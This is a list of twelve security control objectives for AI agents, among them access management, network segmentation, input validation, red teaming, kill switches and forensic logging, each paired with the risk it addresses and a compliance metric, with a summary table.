Control Objectives
Identity and Access Management
Implement comprehensive identity and access management for both agents and users interacting with agents.
Unauthorized agent or user access
Access control compliance rate
Network Segmentation
Implement network segmentation to prevent lateral movement from compromised agents and contain security incidents.
Lateral movement from compromised agents
Segmentation policy compliance
Input Validation Coverage
Ensure comprehensive input validation for all agent inputs to prevent injection and manipulation attacks.
Injection and manipulation attacks
% agents with input validation
Output Sanitization
Sanitize all agent outputs to prevent data leakage and ensure sensitive information is properly redacted.
Data leakage through responses
Output violation incidents
Threat Model Currency
Maintain current threat models for all agents, regularly updating to reflect new attack vectors and vulnerabilities.
Unidentified attack vectors
Threat model review recency
Adversarial Testing Coverage
Conduct regular adversarial testing (red team exercises) for high-tier agents to discover vulnerabilities before attackers.
Undiscovered vulnerabilities
% Tier 3+ agents with red team exercise
Supply Chain Security
Verify the provenance and integrity of all models, components, and dependencies used by agents.
Compromised models or components
Verified provenance percentage
Vendor Security Assessment
Conduct and maintain current security assessments for all third-party vendors providing agent components or services.
Third-party security gaps
% vendors with current assessment
Concentration Risk Management
Monitor and manage concentration risk from over-dependence on single providers for models, infrastructure, or services.
Over-dependence on single providers
Concentration risk score
Incident Response Readiness
Maintain tested incident response procedures specific to AI agent security incidents, including breach response playbooks.
Slow or ineffective breach response
Incident response drill success rate
Kill Switch Availability
Ensure all agents have tested kill switches that can immediately halt agent operations in case of compromise or malfunction.
Inability to stop compromised agents
% agents with tested kill switch
Forensic Logging Adequacy
Maintain comprehensive forensic logging enabling investigation and attribution of security incidents involving agents.
Inability to investigate incidents
Log completeness score
Quick Reference
| ID | Objective | Primary Risk Addressed | Key Metric |
|---|---|---|---|
| SEC-01 | Identity and Access Management | Unauthorized agent or user access | Access control compliance rate |
| SEC-02 | Network Segmentation | Lateral movement from compromised agents | Segmentation policy compliance |
| SEC-03 | Input Validation Coverage | Injection and manipulation attacks | % agents with input validation |
| SEC-04 | Output Sanitization | Data leakage through responses | Output violation incidents |
| SEC-05 | Threat Model Currency | Unidentified attack vectors | Threat model review recency |
| SEC-06 | Adversarial Testing Coverage | Undiscovered vulnerabilities | % Tier 3+ agents with red team exercise |
| SEC-07 | Supply Chain Security | Compromised models or components | Verified provenance percentage |
| SEC-08 | Vendor Security Assessment | Third-party security gaps | % vendors with current assessment |
| SEC-09 | Concentration Risk Management | Over-dependence on single providers | Concentration risk score |
| SEC-10 | Incident Response Readiness | Slow or ineffective breach response | Incident response drill success rate |
| SEC-11 | Kill Switch Availability | Inability to stop compromised agents | % agents with tested kill switch |
| SEC-12 | Forensic Logging Adequacy | Inability to investigate incidents | Log completeness score |